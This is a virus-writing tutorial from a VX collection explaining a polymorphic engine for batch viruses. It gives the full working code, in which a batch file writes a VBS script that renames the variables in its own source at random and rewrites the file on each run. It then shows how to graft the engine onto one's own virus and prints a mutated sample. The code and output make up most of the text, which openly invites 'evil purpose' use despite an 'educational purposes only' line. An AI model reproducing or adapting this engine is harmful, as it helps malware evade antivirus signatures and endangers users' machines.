,, MMP""MM""YMM `7MM P' MM `7 MM MM MMpMMMb. .gP"Ya MM MM MM ,M' Yb MM MM MM 8M"""""" MM MM MM YM. , .JMML. .JMML JMML.`Mbmmd' `7MMF' `7MF' `7MMF' `7MMF' `MA ,V MM MM VM: ,V `7M' `MF' MM MM .gP"Ya ,6"Yb.`7M' `MF'.gP"Ya `7MMpMMMb. MM. M' `VA ,V' MMmmmmmmMM ,M' Yb 8) MM VA ,V ,M' Yb MM MM `MM A' XMX MM MM 8M"""""" ,pm9MM VA ,V 8M"""""" MM MM :MM; ,V' VA. MM MM YM. , 8M MM VVV YM. , MM MM VF .AM. .MA..JMML. .JMML.`Mbmmd' `Moo9^Yo. W `Mbmmd'.JMML JMML. ,, ,, ,, .g8"""bgd `7MM `7MM mm db .dP' `M MM MM MM dM' ` ,pW"Wq. MM MM .gP"Ya ,p6"bo mmMMmm `7MM ,pW"Wq.`7MMpMMMb. MM 6W' `Wb MM MM ,M' Yb 6M' OO MM MM 6W' `Wb MM MM MM. 8M M8 MM MM 8M"""""" 8M MM MM 8M M8 MM MM `Mb. ,'YA. ,A9 MM MM YM. , YM. , MM MM YA. ,A9 MM MM `"bmmmd' `Ybmd9'.JMML..JMML.`Mbmmd' YMbmd' `Mbmo.JMML.`Ybmd9'.JMML JMML. -- Contact -- https://twitter.com/vxunderground vxug@null.net

I have searched high and low for a working Polymorphic batch virii and/or self-polymorphic batch engine, but with no success. So the truth hit me, if i want to create a proper polymorphic batch i will have to turn to the younger brethern of batch - Visual Basic Script. Many poly engines have been coded using VBS so off i went and found an excellent working Batch Polymorphic Script by a VXer named Jackie. I would like to thank her for giving me the foundation of a near perfect polymorphic batch script, so lets get started...

1)The Un-edited Batch-jap-poly engine by Jackie:

What it does is take the variables she listed in the vbs script (line 25-jav) and then replace them with other random letters, and because the VBS is contained in the batch itself it then also polymorphs, the actual polymorphic engine. This is the closest i've seen to actual polymorphism in a batch virii! If you take the code and paste it to notepad, save its as 'something.bat' then run it and see the original bat and the polymorphed one, they do vary greatly. You can run it as much as you want, it will just keep on changing. Dont cut the set lines, as it will then execute its actual virii code and polymorph, we just want keep changing. it to polymorph. Although when using it on our own virii we need to have set commands as it will polymorph them

set blah = echo
set shit = copy
set fuck = A
set hhh = B
set yyy = D
%blah%%shit%%fuck%%shit%%yyy%%fuck%%shit%%blah%%shit%%fuck%%shit%%yyy%%fuck%%shit%
%shit%%yyy%%fuck%%shit%%blah%%shit%%fuck%%shit%%yyy%%fuck%%shit%
%fuck%%shit%%yyy%%fuck%%shit%%blah%%shit%%fuck%%shit%%yyy%%fuck%%shit%
%hhh%%yyy%%yyy%%fuck%%shit%%blah%%shit%%fuck%%shit%%yyy%%fuck%%shit%
%yyy%%fuck%%shit%%yyy%%fuck%%shit%%blah%%shit%%fuck%%shit%%yyy%%fuck%%shit%
%blah%%shit%%fuck%%shit%%yyy%%fuck%%shit%%blah%%shit%%fuck%%shit%%yyy%%fuck%%shit%
%shit%%yyy%%fuck%%shit%%blah%%shit%%fuck%%shit%%yyy%%fuck%%shit%
%fuck%%shit%%yyy%%fuck%%shit%%blah%%shit%%fuck%%shit%%yyy%%fuck%%shit%
%hhh%%yyy%%yyy%%fuck%%shit%%blah%%shit%%fuck%%shit%%yyy%%fuck%%shit%
%yyy%%fuck%%shit%%yyy%%fuck%%shit%%blah%%shit%%fuck%%shit%%yyy%%fuck%%shit%
%blah%%shit%%fuck%%shit%%yyy%%fuck%%shit%%blah%%shit%%fuck%%shit%%yyy%%fuck%%shit%
%shit%%yyy%%fuck%%shit%%blah%%shit%%fuck%%shit%%yyy%%fuck%%shit%
%fuck%%shit%%yyy%%fuck%%shit%%blah%%shit%%fuck%%shit%%yyy%%fuck%%shit%
%hhh%%yyy%%yyy%%fuck%%shit%%blah%%shit%%fuck%%shit%%yyy%%fuck%%shit%
%yyy%%fuck%%shit%%yyy%%fuck%%shit%%blah%%shit%%fuck%%shit%%yyy%%fuck%%shit%
echo randomize>>jjj.vbs
echo set fsobject=createobject("scripting.filesystemobject")>>jjj.vbs
echo set scriptfile=fsobject.opentextfile(%0,1)>>jjj.vbs
echo jc=scriptfile.readall>>jjj.vbs
echo jav="blah shit fuck hhh yyy jap jc jav jsp jv jlo jnv fsobject scriptfile jjj":jsp=split(jav," ")>>jjj.vbs
echo for each jv in jsp>>jjj.vbs
echo for jlo=1 to int(rnd*6)+2>>jjj.vbs
echo jnv=jnv+chr((int(rnd*22)+97))+chr(int(rnd*22)+97)>>jjj.vbs
echo next>>jjj.vbs
echo jc=replace(jc,jv,jnv):jnv="">>jjj.vbs
echo next>>jjj.vbs
echo set scriptfile=fsobject.opentextfile(%0,2,1)>>jjj.vbs
echo scriptfile.writeline jc>>jjj.vbs
echo scriptfile.close>>jjj.vbs
start jjj.vbs
%blah%%shit%%fuck%%shit%%yyy%%fuck%%shit%%blah%%shit%%fuck%%shit%%yyy%%fuck%%shit%
%shit%%yyy%%fuck%%shit%%blah%%shit%%fuck%%shit%%yyy%%fuck%%shit%
%fuck%%shit%%yyy%%fuck%%shit%%blah%%shit%%fuck%%shit%%yyy%%fuck%%shit%
%hhh%%yyy%%yyy%%fuck%%shit%%blah%%shit%%fuck%%shit%%yyy%%fuck%%shit%
%yyy%%fuck%%shit%%yyy%%fuck%%shit%%blah%%shit%%fuck%%shit%%yyy%%fuck%%shit%

Now that we have seen the actual virii its time to modify the poly engine here is the actual working poly engine by itself:

echo randomize>>jjj.vbs
echo set fsobject=createobject("scripting.filesystemobject")>>jjj.vbs
echo set scriptfile=fsobject.opentextfile(%0,1)>>jjj.vbs
echo jc=scriptfile.readall>>jjj.vbs
echo jav="blah shit fuck hhh yyy jap jc jav jsp jv jlo jnv fsobject scriptfile jjj":jsp=split(jav," ")>>jjj.vbs
echo for each jv in jsp>>jjj.vbs
echo for jlo=1 to int(rnd*6)+2>>jjj.vbs
echo jnv=jnv+chr((int(rnd*22)+97))+chr(int(rnd*22)+97)>>jjj.vbs
echo next>>jjj.vbs
echo jc=replace(jc,jv,jnv):jnv="">>jjj.vbs
echo next>>jjj.vbs
echo set scriptfile=fsobject.opentextfile(%0,2,1)>>jjj.vbs
echo scriptfile.writeline jc>>jjj.vbs
echo scriptfile.close>>jjj.vbs
start jjj.vbs

In order to modify the engine for our own evil purpose :) we refer to line 5 (echo jav="blah shit fuck..) we only change blah, shit, fuck, hhh and yyy we change them according to what our set commands are see below for more clarification a it can be confusing for noobs:

set ax=echo
set bv=pause
set cxv=mkdir
set dcv="%UserProfile%\Desktop\%random%"
cls
@%ax% off
%cxv% %dcv%
%ax% hello i made a directory on your desktop
%bv%
echo randomize>>jjj.vbs
echo set fsobject=createobject("scripting.filesystemobject")>>jjj.vbs
echo set scriptfile=fsobject.opentextfile(%0,1)>>jjj.vbs
echo jc=scriptfile.readall>>jjj.vbs
echo jav="ax bv cxv dcv jap jc jav jsp jv jlo jnv fsobject scriptfile jjj":jsp=split(jav," ")>>jjj.vbs
echo for each jv in jsp>>jjj.vbs
echo for jlo=1 to int(rnd*6)+2>>jjj.vbs
echo jnv=jnv+chr((int(rnd*22)+97))+chr(int(rnd*22)+97)>>jjj.vbs
echo next>>jjj.vbs
echo jc=replace(jc,jv,jnv):jnv="">>jjj.vbs
echo next>>jjj.vbs
echo set scriptfile=fsobject.opentextfile(%0,2,1)>>jjj.vbs
echo scriptfile.writeline jc>>jjj.vbs
echo scriptfile.close>>jjj.vbs
start jjj.vbs

As you can see my set commands are ax, bv, cxv and dcv so then i changed the lines (echo jav="blah shit fuck..) to (echo jav="ax bv cxv dcv). An important note to remember is that using a single variable for set commands is not good especially with this poly engine because when i set a=echo it changed all the 'a's in the file, so rather set it to random letters as to avoid confusion with other letters or words.

After running the above script once this is what the new generated polymorphed batch looks like very different from its first variation:

set qnbgqaseqb=echo
set pspnvlekmpeg=pause
set gteijrmkakkgem=mkdir
set cefnmprimvem="%UserProfile%\Desktop\%random%"
cls
@%qnbgqaseqb% off
%gteijrmkakkgem% %cefnmprimvem%
%qnbgqaseqb% hello i made a directory on your desktop
%pspnvlekmpeg%
echo randomize>>ottd.vbs
echo set pvrpic=createobject("scripting.filesystemobject")>>ottd.vbs
echo set shrsqgotpheq=pvrpic.opentextfile(%0,1)>>ottd.vbs
echo ccrqdnshkmldqs=shrsqgotpheq.readall>>ottd.vbs
echo vpbaaptfhpip="qnbgqaseqb pspnvlekmpeg gteijrmkakkgem cefnmprimvem qltj ccrqdnshkmldqs vpbaaptfhpip dtsfjcfd dajihtur ftabvconki tlcdukcj pvrpic shrsqgotpheq ottd":dtsfjcfd=split(vpbaaptfhpip," ")>>ottd.vbs
echo for each dajihtur in dtsfjcfd>>ottd.vbs
echo for ftabvconki=1 to int(rnd*6)+2>>ottd.vbs
echo tlcdukcj=tlcdukcj+chr((int(rnd*22)+97))+chr(int(rnd*22)+97)>>ottd.vbs
echo next>>ottd.vbs
echo ccrqdnshkmldqs=replace(ccrqdnshkmldqs,dajihtur,tlcdukcj):tlcdukcj="">>ottd.vbs
echo next>>ottd.vbs
echo set shrsqgotpheq=pvrpic.opentextfile(%0,2,1)>>ottd.vbs
echo shrsqgotpheq.writeline ccrqdnshkmldqs>>ottd.vbs
echo shrsqgotpheq.close>>ottd.vbs
start ottd.vbs

Thats it for now, i hope it helps and if you use this poly engine please remember to give some credit to Jackie as she did make it. Look out for my next tutorial on Batch IRC Spreading; and remember this is for educational purposes only! :) Drop me a e-mail immortalassassin@rocketmail.com